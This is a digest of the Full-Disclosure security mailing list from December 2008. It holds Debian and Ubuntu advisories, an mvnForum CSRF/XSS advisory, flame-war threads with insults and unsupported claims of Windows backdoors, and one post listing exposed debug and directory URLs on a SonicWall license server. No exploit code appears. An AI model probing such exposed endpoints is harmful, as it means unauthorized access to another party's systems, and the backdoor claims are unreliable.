[mailto:full-disclosure-bounces at lists.grok.org.uk]On Behalf Of n3td3v
Sent: Wednesday, December 03, 2008 11:54 AM
To: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Iran executes IT expert who spied for Israel

Did anyone think Gadi when they read this?

On Mon, Dec 1, 2008 at 10:25 PM, n3td3v wrote:
> ---------- Forwarded message ----------
> From: n3td3v
> Date: Mon, Dec 1, 2008 at 10:23 PM
> Subject: Iran executes IT expert who spied for Israel
> To: n3td3v
>
>
> "A COMPUTER expert has been executed in Iran after he confessed to
> working for Mossad, the Israeli intelligence service. This provides a
> rare insight into the intense espionage activity inside the Islamic
> republic."
>
> http://www.timesonline.co.uk/tol/news/world/middle_east/article5258057.ece
>

From fw at deneb.enyo.de Wed Dec 3 11:05:53 2008
From: fw at deneb.enyo.de (Florian Weimer)
Date: Wed, 03 Dec 2008 12:05:53 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1679-1] New awstats packages fix cross-site scripting
Message-ID: <877i6h7c32.fsf@mid.deneb.enyo.de>

------------------------------------------------------------------------
Debian Security Advisory DSA-1679-1                  security at debian.org
http://www.debian.org/security/                           Florian Weimer
December 03, 2008                     http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : awstats
Vulnerability  : cross-site scripting
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-3714
Debian Bug     : 495432

Morgan Todd discovered a cross-site scripting vulnerability in awstats,
a log file analyzer, involving the "config" request parameter (and
possibly others; CVE-2008-3714).

For the stable distribution (etch), this problem has been fixed in
version 6.5+dfsg-1+etch1.

The unstable (sid) and testing (lenny) distribution will be fixed soon.

We recommend that you upgrade your awstats package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
-------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/a/awstats/awstats_6.5+dfsg-1+etch1.diff.gz
    Size/MD5 checksum:    20369 bbe38406f0402fd5b7be2d0a427223c8
  http://security.debian.org/pool/updates/main/a/awstats/awstats_6.5+dfsg-1+etch1.dsc
    Size/MD5 checksum:     1079 2fd97dfcfcbf48cbe0e4a1a431cb43bd
  http://security.debian.org/pool/updates/main/a/awstats/awstats_6.5+dfsg.orig.tar.gz
    Size/MD5 checksum:  1041837 af6cbfbf470eb45f5238501813d6d1c6

Architecture independent packages:

  http://security.debian.org/pool/updates/main/a/awstats/awstats_6.5+dfsg-1+etch1_all.deb
    Size/MD5 checksum:   837326 878a4f0ab2ccb36c324c0c171a6a39b5

  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From xploitable at gmail.com Wed Dec 3 11:48:26 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 3 Dec 2008 11:48:26 +0000
Subject: [Full-disclosure] Iran executes IT expert who spied for Israel
In-Reply-To:
References: <4b6ee9310812030153x359463eaq74e89623c2317a9f@mail.gmail.com>
Message-ID: <4b6ee9310812030348m1bf5250cj45f0486c1bcb766@mail.gmail.com>

Thank you for
the self validation otherwise I wouldn't know you were
an alias/troll.

On Wed, Dec 3, 2008 at 10:22 AM, Viktor Larionov wrote:
> Viktor Larionov
> snr. system administrator
> R&D team
> Salva Kindlustuse AS
> Parnu mnt. 16
> 10141 Tallinn
> ESTONIA
> tel: (+372) 683 0636, (+372) 680 0500
> fax: (+372) 680 0501
> gsm: (+372) 5668 6811
> viktor.larionov at salva.ee

From svrt at bkav.com.vn Wed Dec 3 13:02:19 2008
From: svrt at bkav.com.vn (SVRT-Bkis)
Date: Wed, 3 Dec 2008 20:02:19 +0700
Subject: [Full-disclosure] [SVRT-06-08] MULTI SECURITY VULNERABILITIES IN MVNFORUM
Message-ID:

MULTI SECURITY VULNERABILITIES IN MVNFORUM

1. General Information

mvnForum is software used for creating forums on the Internet
(http://www.mvnforum.com). This is an open source software making use of
Java J2EE (JSP/Servlet) technology.

On September 6 2008, SVRT-Bkis found several CSRF and XSS vulnerabilities
in some functions of mvnForum 1.2 GA. These are highly serious
vulnerabilities allowing hackers to perform privilege escalation attack
on the Forum. We have contacted the development team and they have
patched all those vulnerabilities in the latest version of mvnForum
1.2.1 GA.

Details                     : http://security.bkis.vn/?p=286
SVRT Advisory               : SVRT-06-08
Initial vendor notification : 30-10-2008
Release Date                : 03-12-2008
Update Date                 : 03-12-2008
Discovered by               : SVRT-Bkis
Attack Type                 : CSRF, XSS
Security Rating             : Critical
Impact                      : Privilege escalation
Affected Software           : mvnForum (version <= 1.2 GA)

2. Technical Description

We have detected five vulnerabilities in different functions of mvnForum,
four of which are CSRF (Cross-site request forgery) flaws and the other
is an XSS (Cross-site scripting) flaw.

More precisely, four CSRF vulnerabilities make way for hackers to
escalate their privilege on such forum by tricking the administrator to
perform some task without asking him/her for confirmation.

Tasks relating to these four vulnerabilities are:

- Creating a new forum where the hacker is the administrator.
- Raise the privilege of an arbitrary account.
- Give an arbitrary account the sub-forum administrator privilege.
- Enable or disable an arbitrary account.

The XSS vulnerability is in the "Who's online" function of the forum. If
hackers successfully exploit this flaw, malicious code (JavaScript) will
be executed whenever the administrator views information with this
function.

3. Solution

Rating these highly critical vulnerabilities, Bkis Center recommends that
all units, organizations and individuals using mvnForum should
immediately update their forums with the latest version of the
application here:
http://sourceforge.net/project/showfiles.php?group_id=65527&package_id=63007

4. Credit

Thanks Dau Huy Ngoc for working with SVRT-Bkis

----------------------------------------------------------------
SVRT, which is short for Security Vulnerability Research Team, is one of
Bkis researching groups. SVRT specializes in the detection, alert and
announcement of security vulnerabilities in software, operating systems,
network protocols and embedded systems.

Bach Khoa Internetwork Security Center (BKIS)
Hanoi University of Technology (Vietnam)

Email   : svrt at bkav.com.vn
Website : www.bkav.com.vn
WebBlog : http://security.bkis.vn
Our PGP : http://security.bkis.vn/policy/pgp/SVRT-Bkis.gpg
----------------------------------------------------------------

SVRT-Bkis

From erik at fortytwo.nl Wed Dec 3 12:57:34 2008
From: erik at fortytwo.nl (Erik van Dam)
Date: Wed, 03 Dec 2008 13:57:34 +0100
Subject: [Full-disclosure] ids / ips survey
Message-ID: <4936823E.6060107@fortytwo.nl>

Dear All,

3 college students are doing a research project on IDS/IPS systems. If
we just could use some of your time to complete the survey we would
very much be pleased!

The survey is about which IDS/IPS systems are used, output reviewed etc.etc.

Thank you very much for your time.

Survey url: http://82.129.25.82/survey/index.php?sid=16247&newtest=Y

Kind regards,
Erik van Dam

From michael.holstein at csuohio.edu Wed Dec 3 14:28:44 2008
From: michael.holstein at csuohio.edu (Michael Holstein)
Date: Wed, 03 Dec 2008 09:28:44 -0500
Subject: [Full-disclosure] Sonicwall license servers down .. all customers affected
In-Reply-To: <689000220812030041v1652ed84qff32aea6ab15a24a@mail.gmail.com>
References: <60af8ffb0812021114i194a4439qe396d4270fe00e8f@mail.gmail.com>
	<49363289.2020508@gmail.com>
	<689000220812030041v1652ed84qff32aea6ab15a24a@mail.gmail.com>
Message-ID: <4936979C.8050507@csuohio.edu>

> https://licensemanager.sonicwall.com/newui/admin/admin.jsp
>
> that's hilarious - it MUST be a kind of honeypot :P
>

I think they threw up a new licensemanager server without reviewing the
config .. it allows directory enumeration on a lot of pages (including
the root).

This one is interesting :
https://licensemanager.sonicwall.com/js/ClientValidationMethods.js

Seems remote debug is on as well :
https://licensemanager.sonicwall.com/mf/fwregister_done.jsp

Cheers,

Michael Holstein CISSP GCIA
Cleveland State University

From ureleet at gmail.com Wed Dec 3 14:52:46 2008
From: ureleet at gmail.com (Ureleet)
Date: Wed, 3 Dec 2008 09:52:46 -0500
Subject: [Full-disclosure] News for Ureleet
In-Reply-To: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com>
References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com>
Message-ID: <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com>

luky 4 us, u arent any of the 3. thats a load off of our minds.

On Wed, Dec 3, 2008 at 3:43 AM, n3td3v wrote:
> I don't write news articles and I copy and paste abstracts from them,
> welcome to fair use. If I wanted to be a news journalist I wouldn't be
> a security researcher and ethical hacker.
>
> http://en.wikipedia.org/wiki/Fair_use
>

From ureleet at gmail.com Wed Dec 3 14:55:04 2008
From: ureleet at gmail.com (Ureleet)
Date: Wed, 3 Dec 2008 09:55:04 -0500
Subject: [Full-disclosure] Iran executes IT expert who spied for Israel
In-Reply-To: <4b6ee9310812030348m1bf5250cj45f0486c1bcb766@mail.gmail.com>
References: <4b6ee9310812030153x359463eaq74e89623c2317a9f@mail.gmail.com>
	<4b6ee9310812030348m1bf5250cj45f0486c1bcb766@mail.gmail.com>
Message-ID: <6158bb410812030655m3d8f88adj5a7c3f5084dad4c1@mail.gmail.com>

hes not a troll andrew. he brings up good points. u nd i are the only
trolls here. i only troll u. you troll every1.

On Wed, Dec 3, 2008 at 6:48 AM, n3td3v wrote:
> Thank you for the self validation otherwise I wouldn't know you were
> an alias/troll.
>
> On Wed, Dec 3, 2008 at 10:22 AM, Viktor Larionov
> wrote:
>> Viktor Larionov
>> snr. system administrator
>> R&D team
>> Salva Kindlustuse AS
>> Parnu mnt. 16
>> 10141 Tallinn
>> ESTONIA
>> tel: (+372) 683 0636, (+372) 680 0500
>> fax: (+372) 680 0501
>> gsm: (+372) 5668 6811
>> viktor.larionov at salva.ee
>

From ureleet at gmail.com Wed Dec 3 14:55:49 2008
From: ureleet at gmail.com (Ureleet)
Date: Wed, 3 Dec 2008 09:55:49 -0500
Subject: [Full-disclosure] ids / ips survey
In-Reply-To: <4936823E.6060107@fortytwo.nl>
References: <4936823E.6060107@fortytwo.nl>
Message-ID: <6158bb410812030655k6b185677h11e028a0be97294f@mail.gmail.com>

yeah, nice try. lets all just go click on the link that u post in fd. !

On Wed, Dec 3, 2008 at 7:57 AM, Erik van Dam wrote:
> Dear All,
>
> 3 college students are doing a research project on IDS/IPS systems. If
> we just could use some of your time to complete the survey we would
> very much be pleased!
>
> The survey is about which IDS/IPS systems are used, output reviewed etc.etc.
>
> Thank you very much for your time.
>
> Survey url: http://82.129.25.82/survey/index.php?sid=16247&newtest=Y
>
>
> Kind regards,
> Erik van Dam
>

From ureleet at gmail.com Wed Dec 3 14:56:10 2008
From: ureleet at gmail.com (Ureleet)
Date: Wed, 3 Dec 2008 09:56:10 -0500
Subject: [Full-disclosure] More proof that Microsoft products are probably backdoored
In-Reply-To: <4b6ee9310812030034laa99d7k758c619c817e8ba7@mail.gmail.com>
References: <4b6ee9310812011313t1c99e858p3da9f8a278c97512@mail.gmail.com>
	<4b6ee9310812011451j5a04367ewc7752363e8f12ac@mail.gmail.com>
	<4b6ee9310812011532g7821896bgdf6f149502c9e152@mail.gmail.com>
	<6158bb410812020556r38ca2d25m201be44a4969dfbd@mail.gmail.com>
	<6158bb410812021011p6029b3bfxadb35266b7f1af91@mail.gmail.com>
	<4b6ee9310812030034laa99d7k758c619c817e8ba7@mail.gmail.com>
Message-ID: <6158bb410812030656p1f3ba54ak72b45a9961bcb91a@mail.gmail.com>

pot kettle black

On Wed, Dec 3, 2008 at 3:34 AM, n3td3v wrote:
> You're like a shite that won't flush away.
>
> On Tue, Dec 2, 2008 at 6:11 PM, Ureleet wrote:
>> all speculation:
>>
>> no 1 knows 4 sure.
>>
>> http://it.slashdot.org/article.pl?sid=07/12/17/1754257&from=rss
>>
>> http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/
>>
>> http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm
>>
>> c how i did that n3td3v? i posted links, nd talked about the article
>> w/out stealing ppls work.
>>
>> pay attention.
>>
>>
>> On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight wrote:
>>> 2008/12/2 Ureleet
>>>>
>>>> u arent getting it.
>>>>
>>>> it has nothing 2 do w/ backdoors. they r talking about actual
>>>> backdoors in the code. so that anyone who knows the backdoor can
>>>> acess any windows system regarless. they r saying that microsoft has
>>>> coded backdoors into the system so that the govt can get into any
>>>> system, patched or not. pay attention.
>>>
>>> I haven't seen anything that suggests that systems are/will be backdoored
>>> here. The text of the statement said "remote searches" which in legal terms
>>> could be anything from something as simple as browsing shared files
>>> available through P2P to full remote system access.
>>>
>>> Do you have anything else that suggests Windows has backdoors present other
>>> than this statement?
>>>
>>
>

From erik at fortytwo.nl Wed Dec 3 15:01:23 2008
From: erik at fortytwo.nl (Erik van Dam)
Date: Wed, 03 Dec 2008 16:01:23 +0100
Subject: [Full-disclosure] ids / ips survey
In-Reply-To: <6158bb410812030655k6b185677h11e028a0be97294f@mail.gmail.com>
References: <4936823E.6060107@fortytwo.nl>
	<6158bb410812030655k6b185677h11e028a0be97294f@mail.gmail.com>
Message-ID: <49369F43.30703@fortytwo.nl>

Ureleet wrote:
> yeah, nice try. lets all just go click on the link that u post in fd. !
>
> On Wed, Dec 3, 2008 at 7:57 AM, Erik van Dam wrote:
>> Dear All,
>>
>> 3 college students are doing a research project on IDS/IPS systems. If
>> we just could use some of your time to complete the survey we would
>> very much be pleased!
>>
>> The survey is about which IDS/IPS systems are used, output reviewed etc.etc.
>>
>> Thank you very much for your time.
>>
>> Survey url: http://82.129.25.82/survey/index.php?sid=16247&newtest=Y
>>
>>
>> Kind regards,
>> Erik van Dam
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > It's an real survey, but thank you for your paranoism. -- Met vriendelijke groet, Erik van Dam From hhoffman at ip-solutions.net Wed Dec 3 15:12:52 2008 From: hhoffman at ip-solutions.net (Harry Hoffman) Date: Wed, 03 Dec 2008 10:12:52 -0500 Subject: [Full-disclosure] ids / ips survey In-Reply-To: <6158bb410812030655k6b185677h11e028a0be97294f@mail.gmail.com> References: <4936823E.6060107@fortytwo.nl> <6158bb410812030655k6b185677h11e028a0be97294f@mail.gmail.com> Message-ID: <1228317172.7508.1.camel@n1-14-96.dhcp.drexel.edu> Or even more scary... that you would run a survey app on the same system that you do all of your monitoring from :-( On Wed, 2008-12-03 at 09:55 -0500, Ureleet wrote: > yeah, nice try. lets all just go click on the link that u post in fd. ! > > On Wed, Dec 3, 2008 at 7:57 AM, Erik van Dam wrote: > > Dear All, > > > > 3 college students are doing an research project on IDS/IPS systems. If > > we just could use a some of your time to complete the survey we would > > very much be pleased! > > > > The survey is about which IDS/IPS systems is used, output reviewed etc.etc. > > > > Thank you very much for your time. > > > > Survey url: http://82.129.25.82/survey/index.php?sid=16247&newtest=Y > > > > > > Kind regards, > > Erik van Dam > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. 
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From j.sentiar at gmail.com Wed Dec 3 16:28:08 2008 From: j.sentiar at gmail.com (j-f sentier) Date: Wed, 3 Dec 2008 11:28:08 -0500 Subject: [Full-disclosure] More proof that Microsoft products are probably backdoored In-Reply-To: <4b6ee9310812030034laa99d7k758c619c817e8ba7@mail.gmail.com> References: <4b6ee9310812011313t1c99e858p3da9f8a278c97512@mail.gmail.com> <4b6ee9310812011451j5a04367ewc7752363e8f12ac@mail.gmail.com> <4b6ee9310812011532g7821896bgdf6f149502c9e152@mail.gmail.com> <6158bb410812020556r38ca2d25m201be44a4969dfbd@mail.gmail.com> <6158bb410812021011p6029b3bfxadb35266b7f1af91@mail.gmail.com> <4b6ee9310812030034laa99d7k758c619c817e8ba7@mail.gmail.com> Message-ID: <6f80feaf0812030828p4f43a79dvae8d8dbe0353a866@mail.gmail.com> If there's a peace of shit around here that should be flushed, it's only you n3tcr4p No one like you, get the fuck back on your kiddie mailing list/group. 2008/12/3 n3td3v > You're like a shite that won't flush away. > > On Tue, Dec 2, 2008 at 6:11 PM, Ureleet wrote: > > all speculation: > > > > no 1 knows 4 sure. > > > > http://it.slashdot.org/article.pl?sid=07/12/17/1754257&from=rss > > > > http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/ > > > > http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm > > > > c how i did that n3td3v? i posted links, nd talked about the article > > w/out stealing ppls work. > > > > pay attention. > > > > > > On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight > wrote: > >> 2008/12/2 Ureleet > >>> > >>> u arent getting it. > >>> > >>> it has nothing 2 do w/ backdoors. they r talking about actual > >>> backdoors in the code. so that anyone who knows the backdoor can > >>> acess any windows system regarless. they r saying that microsoft has > >>> coded backdoors into the system so that the govt can get into any > >>> system, patched or not. pay attention. 
> >> > >> I haven't seen anything that suggests that systems are/will be > backdoored > >> here. The text of the statement said "remote searches" which in legal > terms > >> could be anything from something as simple as browsing shared files > >> available through P2P to full remote system access. > >> > >> Do you have anything else that suggests Windows has backdoors present > other > >> than this statement? > >> > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From white at debian.org Wed Dec 3 06:15:24 2008 From: white at debian.org (Steffen Joeris) Date: Wed, 03 Dec 2008 07:15:24 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1678-1] New perl packages fix privilege escalation Message-ID: <87vdu1lr7n.fsf@mid.deneb.enyo.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1678-1 security at debian.org http://www.debian.org/security/ Steffen Joeris December 03, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : perl Vulnerability : design flaws Problem type : local Debian-specific: no CVE Id(s) : CVE-2008-5302 CVE-2008-5303 Debian Bug : 286905 286922 Paul Szabo rediscovered a vulnerability in the File::Path::rmtree function of Perl.
It was possible to exploit a race condition to create setuid binaries in a directory tree or remove arbitrary files when a process is deleting this tree. This issue was originally known as CVE-2005-0448 and CVE-2004-0452, which were addressed by DSA-696-1 and DSA-620-1. Unfortunately, they were reintroduced later. For the stable distribution (etch), these problems have been fixed in version 5.8.8-7etch5. For the unstable distribution (sid), these problems have been fixed in version 5.10.0-18 and will migrate to the testing distribution (lenny) shortly. We recommend that you upgrade your perl packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. 
Debian GNU/Linux 4.0 alias etch - ------------------------------- These files will probably be moved into the stable distribution on its next update.
- --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) -----END PGP SIGNATURE----- From jmenerick at netsuite.com Wed Dec 3 18:13:29 2008 From: jmenerick at netsuite.com (Menerick, John) Date: Wed, 3 Dec 2008 10:13:29 -0800 Subject: [Full-disclosure] ids / ips survey In-Reply-To: <1228317172.7508.1.camel@n1-14-96.dhcp.drexel.edu> References: <4936823E.6060107@fortytwo.nl> <6158bb410812030655k6b185677h11e028a0be97294f@mail.gmail.com> <1228317172.7508.1.camel@n1-14-96.dhcp.drexel.edu> Message-ID: <10CD0A2672F6814A988052F37D8D67554075F7F6@corpmail2007.corp.netledger.com> Scarier yet is that the system is from a part of the internet in IDS/IPS blacklist territory. -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Harry Hoffman Sent: Wednesday, December 03, 2008 7:13 AM To: Ureleet Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] ids / ips survey Or even more scary... that you would run a survey app on the same system that you do all of your monitoring from :-( On Wed, 2008-12-03 at 09:55 -0500, Ureleet wrote: > yeah, nice try. lets all just go click on the link that u post in fd. !
> > On Wed, Dec 3, 2008 at 7:57 AM, Erik van Dam wrote: > > Dear All, > > > > 3 college students are doing an research project on IDS/IPS systems. If > > we just could use a some of your time to complete the survey we would > > very much be pleased! > > > > The survey is about which IDS/IPS systems is used, output reviewed etc.etc. > > > > Thank you very much for your time. > > > > Survey url: http://82.129.25.82/survey/index.php?sid=16247&newtest=Y > > > > > > Kind regards, > > Erik van Dam > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
From xploitable at gmail.com Wed Dec 3 21:46:13 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Dec 2008 21:46:13 +0000 Subject: [Full-disclosure] News for Ureleet In-Reply-To: <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com> References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com> <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com> Message-ID: <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com> You'll never know and thats what bugs you. ;) On Wed, Dec 3, 2008 at 2:52 PM, Ureleet wrote: > luky 4 us, u arent any of the 3. > > thats a load off of our minds. > > On Wed, Dec 3, 2008 at 3:43 AM, n3td3v wrote: >> I don't write news articles and I copy and paste abstracts from them, >> welcome to fair use. If I wanted to be a news journalist I wouldn't be >> a security researcher and ethical hacker. >> >> http://en.wikipedia.org/wiki/Fair_use >> > From xploitable at gmail.com Wed Dec 3 22:03:46 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 3 Dec 2008 22:03:46 +0000 Subject: [Full-disclosure] More proof that Microsoft products are probably backdoored In-Reply-To: <6f80feaf0812030828p4f43a79dvae8d8dbe0353a866@mail.gmail.com> References: <4b6ee9310812011313t1c99e858p3da9f8a278c97512@mail.gmail.com> <4b6ee9310812011451j5a04367ewc7752363e8f12ac@mail.gmail.com> <4b6ee9310812011532g7821896bgdf6f149502c9e152@mail.gmail.com> <6158bb410812020556r38ca2d25m201be44a4969dfbd@mail.gmail.com> <6158bb410812021011p6029b3bfxadb35266b7f1af91@mail.gmail.com> <4b6ee9310812030034laa99d7k758c619c817e8ba7@mail.gmail.com> <6f80feaf0812030828p4f43a79dvae8d8dbe0353a866@mail.gmail.com> Message-ID: <4b6ee9310812031403v72e4bd05ne7336fdd9b01b94d@mail.gmail.com> There are no kiddies on the group and any that appear get banned. On Wed, Dec 3, 2008 at 4:28 PM, j-f sentier wrote: > If there's a peace of shit around here that should be flushed, it's only you > n3tcr4p > No one like you, get the fuck back on your kiddie mailing list/group. 
> > > > > 2008/12/3 n3td3v >> >> You're like a shite that won't flush away. >> >> On Tue, Dec 2, 2008 at 6:11 PM, Ureleet wrote: >> > all speculation: >> > >> > no 1 knows 4 sure. >> > >> > http://it.slashdot.org/article.pl?sid=07/12/17/1754257&from=rss >> > >> > http://www.cnn.com/TECH/computing/9909/03/windows.nsa.02/ >> > >> > http://www.theforbiddenknowledge.com/hardtruth/nsa_backdoor_windows.htm >> > >> > c how i did that n3td3v? i posted links, nd talked about the article >> > w/out stealing ppls work. >> > >> > pay attention. >> > >> > >> > On Tue, Dec 2, 2008 at 9:36 AM, Andy McKnight >> > wrote: >> >> 2008/12/2 Ureleet >> >>> >> >>> u arent getting it. >> >>> >> >>> it has nothing 2 do w/ backdoors. they r talking about actual >> >>> backdoors in the code. so that anyone who knows the backdoor can >> >>> acess any windows system regarless. they r saying that microsoft has >> >>> coded backdoors into the system so that the govt can get into any >> >>> system, patched or not. pay attention. >> >> >> >> I haven't seen anything that suggests that systems are/will be >> >> backdoored >> >> here. The text of the statement said "remote searches" which in legal >> >> terms >> >> could be anything from something as simple as browsing shared files >> >> available through P2P to full remote system access. >> >> >> >> Do you have anything else that suggests Windows has backdoors present >> >> other >> >> than this statement? >> >> >> > >> > _______________________________________________ >> > Full-Disclosure - We believe in it. >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> > Hosted and sponsored by Secunia - http://secunia.com/ >> > >> >> _______________________________________________ >> Full-Disclosure - We believe in it. 
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > > From kees at ubuntu.com Wed Dec 3 22:41:30 2008 From: kees at ubuntu.com (Kees Cook) Date: Wed, 3 Dec 2008 14:41:30 -0800 Subject: [Full-disclosure] [USN-685-1] Net-SNMP vulnerabilities Message-ID: <20081203224130.GQ25309@outflux.net> =========================================================== Ubuntu Security Notice USN-685-1 December 03, 2008 net-snmp vulnerabilities CVE-2008-0960, CVE-2008-2292, CVE-2008-4309 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libsnmp-perl 5.2.1.2-4ubuntu2.3 libsnmp9 5.2.1.2-4ubuntu2.3 Ubuntu 7.10: libsnmp-perl 5.3.1-6ubuntu2.2 libsnmp10 5.3.1-6ubuntu2.2 Ubuntu 8.04 LTS: libsnmp-perl 5.4.1~dfsg-4ubuntu4.2 libsnmp15 5.4.1~dfsg-4ubuntu4.2 Ubuntu 8.10: libsnmp15 5.4.1~dfsg-7.1ubuntu6.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Wes Hardaker discovered that the SNMP service did not correctly validate HMAC authentication requests. An unauthenticated remote attacker could send specially crafted SNMPv3 traffic with a valid username and gain access to the user's views without a valid authentication passphrase. (CVE-2008-0960) John Kortink discovered that the Net-SNMP Perl module did not correctly check the size of returned values. If a user or automated system were tricked into querying a malicious SNMP server, the application using the Perl module could be made to crash, leading to a denial of service. This did not affect Ubuntu 8.10. (CVE-2008-2292) It was discovered that the SNMP service did not correctly handle large GETBULK requests. 
If an unauthenticated remote attacker sent a specially crafted request, the SNMP service could be made to crash, leading to a denial of service. (CVE-2008-4309) Updated packages for Ubuntu 7.10: sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.3.1-6ubuntu2.2_sparc.deb Size/MD5: 2527568 19b1a0971259a9b99f9c0386f5935bfc http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.3.1-6ubuntu2.2_sparc.deb Size/MD5: 970264 d8ae7f0bb10375ad487b14ba031cd013 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp10_5.3.1-6ubuntu2.2_sparc.deb Size/MD5: 1078842 2401fc4c40352b8c8013e8c5de3b0ecd http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.3.1-6ubuntu2.2_sparc.deb Size/MD5: 995228 16b230d3c718d8eb4a023126bd09d7f5 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.3.1-6ubuntu2.2_sparc.deb Size/MD5: 908708 1e410a8ddac41ad9faec901c5a638f29 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-4ubuntu4.2.diff.gz Size/MD5: 78642 b4acf50e47be498e579b934f32081d25 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-4ubuntu4.2.dsc Size/MD5: 1447 0abcea5df87851df2aae7ebd1fc00e7a http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg.orig.tar.gz Size/MD5: 4618308 0ef987c41d3414f2048c94d187a2baeb Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-base_5.4.1~dfsg-4ubuntu4.2_all.deb Size/MD5: 526864 f3a131bf5a4f5c547573430cb66d410c http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/tkmib_5.4.1~dfsg-4ubuntu4.2_all.deb Size/MD5: 102072 2f276f50efdb7e34f7e61f132f7f7cd7 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_amd64.deb Size/MD5: 1796950 283c5a95206ab74062e0e30eba4e0890 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_amd64.deb Size/MD5: 142522 9fff294368a7eac39e37fa478ac6609d http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_amd64.deb Size/MD5: 1296694 
